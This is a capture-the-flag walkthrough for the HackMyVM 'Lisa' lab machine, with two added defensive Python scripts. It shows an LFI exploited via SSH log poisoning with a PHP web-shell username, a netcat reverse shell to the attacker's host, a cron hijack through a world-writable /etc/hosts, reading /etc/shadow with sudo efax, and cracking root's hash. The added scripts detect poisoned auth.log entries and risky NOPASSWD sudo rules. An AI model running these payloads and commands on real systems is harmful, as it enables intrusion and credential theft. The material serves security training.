HackMyVm Lisa Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Lisa
Scan ports.
```
nmap -sV -sC -p- -oN ports.log 192.168.56.100
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 17:f7:58:02:e9:00:69:04:c5:88:ba:65:5a:11:dc:58 (RSA)
|   256 4c:32:c5:92:8c:d9:06:a4:a9:89:fa:99:92:bb:66:7f (ECDSA)
|_  256 d1:36:d3:da:2b:7f:d7:03:5f:fc:1b:94:aa:7e:04:af (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Enumerating port 80 turns up nothing useful, but the default index.html carries a hint about the domain name vinci.hmv.
```
~ curl http://192.168.56.100/index.html |tail -n 15
<p>
Please report bugs specific to modules (such as PHP and others)
to respective packages, not to the web server itself. contact: vinci.hmv
</p>
</div>
```
Add vinci.hmv to /etc/hosts and scan port 80 again; still nothing useful.
Use gobuster to enumerate virtual hosts (the `grep -v 10719` filters out the lines carrying the response size that every non-matching name returns).
```
~ gobuster vhost -u vinci.hmv -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -v |grep -v 10719
===============================================================
...
Missed: secret.vinci.hmv (Status: 200) [Size: 80]
===============================================================
2021/07/04 15:35:24 Finished
===============================================================
```
Add secret.vinci.hmv to /etc/hosts and brute-force files again; this time file.php turns up.
```
~ gobuster dir -u http://secret.vinci.hmv -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.zip,.bak,.php.bak -b 401,403,404,500 --wildcard -o 80_secret.log
===============================================================
/index.html (Status: 200) [Size: 80]
/file.php (Status: 200) [Size: 0]
```
Use wfuzz to find the parameter name (`--hh 0` hides the empty responses file.php returns for every wrong name).
```
~ wfuzz -u 'http://secret.vinci.hmv/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
=====================================================================
ID           Response   Lines    Word     Chars       Payload
=====================================================================
000004959:   200        26 L     42 W     1441 Ch     "command"
```
Looks like an LFI.
```
~ curl 'http://secret.vinci.hmv/file.php?command=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
leonardo:x:1000:1000:leonardo,,,:/home/leonardo:/bin/bash
...
```
See what files we can read.
```
~ wfuzz -u 'http://secret.vinci.hmv/file.php?command=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hh 0
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
...
000000188:   200        0 L      1 W      32032 Ch    "/var/log/faillog"
000000173:   200        1364 L   16410 W  130186 Ch   "/var/log/auth.log"
000000181:   200        2993 L   17879 W  202004 Ch   "/var/log/dpkg.log"
000000220:   200        5 L      85 W     74873 Ch    "/var/log/wtmp"
000000224:   200        0 L      1 W      1152 Ch     "/var/run/utmp"
000000199:   200        0 L      1 W      292292 Ch   "/var/log/lastlog"
```
auth.log records the username of every SSH login attempt, and the LFI lets us include that file, so we can poison the log by using PHP code as the SSH username.
```
~ ssh '<?php system($_GET[c]);?>'@192.168.56.100
<?php system($_GET[c]);?>@192.168.56.100's password:
Permission denied, please try again.
```
Now we can run shell commands through the extra `c` parameter; the output lands inside the poisoned log line.
```
~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=id'
...
Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups=33(www-data) from 192.168.56.150 port 33632 ssh2
...
```
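From the defender's side, the poisoned entry is easy to spot: the "username" sshd logged is PHP, not a name. The following script is an added example (not part of the walkthrough) that parses sshd lines from auth.log and flags invalid-user entries whose username contains code-like content. The sample log lines are constructed to mirror the format on this box; the suspicious-token list is an assumption.

```python
import re

# Constructed sample of auth.log lines in the format OpenSSH writes on Lisa.
# Lines 2 and 3 carry the injected PHP username seen in the walkthrough.
SAMPLE_AUTH_LOG = """\
Jun 20 21:50:01 Lisa sshd[7801]: Failed password for invalid user admin from 192.168.56.150 port 33610 ssh2
Jun 20 21:53:12 Lisa sshd[7932]: Invalid user <?php system($_GET[c]);?> from 192.168.56.150 port 33632
Jun 20 21:53:14 Lisa sshd[7932]: Failed password for invalid user <?php system($_GET[c]);?> from 192.168.56.150 port 33632 ssh2
Jun 20 21:55:28 Lisa sshd[7950]: Accepted publickey for leonardo from 192.168.56.150 port 33700 ssh2
"""

# Matches both forms OpenSSH uses for unknown accounts:
#   "Invalid user X from IP port N" and "Failed password for invalid user X from IP port N ssh2".
LOGIN_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: (?:Failed password for invalid user|Invalid user) "
    r"(?P<user>.+?) from (?P<src>[0-9a-fA-F.:]+) port (?P<port>\d+)"
)

# Assumed watchlist: tokens that never belong in a username and indicate an attempt
# to plant executable content in the log for later inclusion through an LFI.
SUSPICIOUS_RE = re.compile(r"<\?|\$_(?:GET|POST|REQUEST|COOKIE)|<script|\$\(|`")


def find_poisoned_usernames(log_text):
    """Return one finding per line whose attempted username contains code-like content."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LOGIN_RE.search(line)
        if not m:
            continue
        user = m.group("user")
        if SUSPICIOUS_RE.search(user):
            findings.append({
                "line": lineno,
                "src": m.group("src"),
                "user": user,
                "pid": int(m.group("pid")),
            })
    return findings


if __name__ == "__main__":
    for f in find_poisoned_usernames(SAMPLE_AUTH_LOG):
        print(f"line {f['line']}: suspicious username from {f['src']}: {f['user']!r}")
```

Run it against a real auth.log by reading the file into `find_poisoned_usernames`; an alert on the first such line is early enough, since the payload only becomes dangerous once an include bug lets the web server parse the log.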
Get a reverse shell.
```
~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'
```
```
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:52344.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
There is only one user, leonardo, and /opt/cron.sh belongs to him.
```
www-data@Lisa:/home/leonardo$ find / -user leonardo 2>/dev/null
find / -user leonardo 2>/dev/null
/home/leonardo
/home/leonardo/.bash_logout
/home/leonardo/.profile
/home/leonardo/.bashrc
/home/leonardo/.local
/home/leonardo/.local/share
/home/leonardo/.selected_editor
/home/leonardo/user.txt
/opt/cron.sh
```
Check the source code of cron.sh. It pings shelly.lisa.hmv once a run and, if the host answers, connects back to it on port 65000 with `nc -e /bin/sh`, so whoever controls that name gets a shell as the user the cron job runs as.
```
www-data@Lisa:/opt$ cat cron.sh
cat cron.sh
#!/bin/bash
domain='shelly.lisa.hmv'
function check(){
timeout 1 bash -c "ping -c 1 $domain" > /dev/null 2>&1
if [ "$(echo $?)" == "0" ]; then
nohup nc -e /bin/sh $domain 65000
exit 0
else
ifconfig
exit 1
fi
}
```
/etc/hosts is world-writable (`-rw----rw-`), so any user can point shelly.lisa.hmv at the attacker's machine. Note that `>` replaces the whole file, dropping the machine's own entry.
```
www-data@Lisa:/opt$ ls -la /etc/hosts
ls -la /etc/hosts
-rw----rw- 1 root root 457 Jun 14 17:55 /etc/hosts
www-data@Lisa:/opt$ echo '192.168.56.150 shelly.lisa.hmv' > /etc/hosts
```
Wait a minute and the cron job connects back, giving us a shell as leonardo.
```
~ nc -nlvp 65000
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::65000
Ncat: Listening on 0.0.0.0:65000
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49036.
id
uid=1000(leonardo) gid=1000(leonardo) grupos=1000(leonardo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```
Put our public key (id_rsa.pub) into /home/leonardo/.ssh/authorized_keys, chmod it to 600, and we have SSH access.
```
~ ssh leonardo@192.168.56.100
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux Lisa 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 14 13:01:44 2021 from 192.168.1.83
/usr/bin/xauth: file /home/leonardo/.Xauthority does not exist
leonardo@Lisa:~$
```
Check `sudo -l` (the "unable to resolve host Lisa" warning is a side effect of having overwritten /etc/hosts earlier).
```
leonardo@Lisa:~$ sudo -l
sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
Matching Defaults entries for leonardo on Lisa:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User leonardo may run the following commands on Lisa:
    (root) NOPASSWD: /usr/bin/efax
```
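A sudo rule like this one is worth catching before an attacker does. The script below is an added example (not part of the walkthrough) that parses `sudo -l` output and reports rules that run a command as root without a password; it also notes when the binary is one that takes an arbitrary file path, since such a rule is an arbitrary-file-read as root. The sample output is constructed from the lines shown above plus one passworded rule for contrast, and the `FILE_ARG_BINARIES` watchlist is an assumption (efax is on it because of what this box demonstrates).

```python
import re

# Constructed `sudo -l` output: Lisa's real rule plus an extra rule that requires a password.
SAMPLE_SUDO_L = """\
Matching Defaults entries for leonardo on Lisa:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User leonardo may run the following commands on Lisa:
    (root) NOPASSWD: /usr/bin/efax
    (root) /usr/bin/apt-get update
"""

# One command rule: "(runas) TAG: TAG: command args".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$"
)

# Assumed watchlist of binaries whose argument is a path they open and echo back.
FILE_ARG_BINARIES = {"efax"}


def parse_sudo_l(text):
    """Return a list of {'runas', 'nopasswd', 'cmd'} for each command rule in `sudo -l` output."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue  # skip the Defaults block
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "cmd": m.group("cmd").strip(),
        })
    return rules


def risky_rules(text):
    """Return (cmd, reason) for rules that run as root with NOPASSWD."""
    out = []
    for r in parse_sudo_l(text):
        # "(root)", "(ALL)" and "(ALL : ALL)" all allow running as root.
        runas_users = {u.strip() for u in r["runas"].split(":")[0].split(",")}
        if not ({"root", "ALL"} & runas_users and r["nopasswd"]):
            continue
        binary = r["cmd"].split()[0].rsplit("/", 1)[-1]
        reason = "runs as root without a password"
        if binary in FILE_ARG_BINARIES:
            reason += "; %s opens any path given to it, so root-only files are readable" % binary
        out.append((r["cmd"], reason))
    return out


if __name__ == "__main__":
    for cmd, reason in risky_rules(SAMPLE_SUDO_L):
        print(cmd, "->", reason)
```

Feed it the real output with `risky_rules(open("sudo-l.txt").read())` after saving `sudo -l` to a file; the fix on Lisa's side is to drop the rule or at least remove NOPASSWD and restrict efax to the fax device it is meant for.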
Use efax to read the shadow file. The `-d` option expects a serial device, but efax opens whatever path it is given and echoes each line it reads back as an "unexpected response" warning, so the file's contents come out line by line.
```
leonardo@Lisa:~$ sudo efax -d /etc/shadow
sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 10:17 compiled Dec 15 2016 12:12:26
efax: 10:17 opened /etc/shadow
efax: 10:17 Error: tcgetattr on fd=3 failed: Función ioctl no apropiada para el dispositivo
efax: 10:17 Warning: unexpected response "root:$6$RnHOYwKvoinsNFhF$zdIHAyW0TtHpAfnUc2p2bEPaHTuu/vdRFcTOSzOokSflUo/YoqDU3NzSCtm9VRELG53fGVrfen1PNBKGt6gix0:18792:0:99999:7:::"
efax: 10:17 Warning: unexpected response "daemon::18791:0:99999:7:::"
efax: 10:17 Warning: unexpected response "bin::18791:0:99999:7:::"
...
```
Save root's line to hash.txt and use john to crack the hash.
```
~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveme          (root)
1g 0:00:00:00 DONE (2021-07-05 10:28) 6.666g/s 1706p/s 1706c/s 1706C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
Get root at last.
```
leonardo@Lisa:~$ su root
Contraseña:
root@Lisa:~# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
Lisa
```